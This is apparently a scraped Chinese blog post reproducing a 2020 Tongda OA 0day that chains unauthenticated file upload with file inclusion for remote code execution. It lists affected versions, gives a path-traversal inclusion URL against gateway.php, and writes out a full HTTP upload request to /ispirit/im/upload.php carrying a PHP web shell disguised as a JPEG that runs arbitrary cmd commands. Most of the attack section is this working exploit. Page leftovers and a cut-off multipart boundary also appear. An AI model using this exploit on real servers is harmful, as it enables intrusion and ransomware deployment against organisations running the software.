通达 oa php 文件 乱,通达(tongda)OA文件上传和文件包含漏洞重现及分析"/>
通达 oa php 文件 乱,通达(tongda)OA文件上传和文件包含漏洞重现及分析
0x00 概述
20200317,网上爆出通达oa被利用0day中勒索病毒的消息,官方已出漏洞补丁。
该0day为利用文件上传和文件包含组合利用进行RCE,无须认证。
0x01 影响范围
2013,2013增强版,2015,2016,2017,v11
//补丁只看见v11(2020)有geteway.php(文件包含漏洞)补丁
0x02 漏洞重现
利用v11版本:
文件包含漏洞
http://localhost/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log
文件上传漏洞
上传文件路径在非webroot目录,如:
“D:\MYOA\attach\im\2003\ddd.test.jpg”
请求数据包:
POST /ispirit/im/upload.php HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 633
Content-Type: multipart/form-data; boundary=ee65cd98fdbee896acd30a7b2552b6b5
--ee65cd98fdbee896acd30a7b2552b6b5
Content-Disposition: form-data; name="P"
x
--ee65cd98fdbee896acd30a7b2552b6b5
Content-Disposition: form-data; name="UPLOAD_MODE"
1
--ee65cd98fdbee896acd30a7b2552b6b5
Content-Disposition: form-data; name="DEST_UID"
1
--ee65cd98fdbee896acd30a7b2552b6b5
Content-Disposition: form-data; name="ATTACHMENT"; filename="test07.jpg"
Content-Type: image/jpeg
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
--ee65cd98fdbe
更多推荐
通达 oa php 文件 乱,通达(tongda)OA文件上传和文件包含漏洞重现及分析
发布评论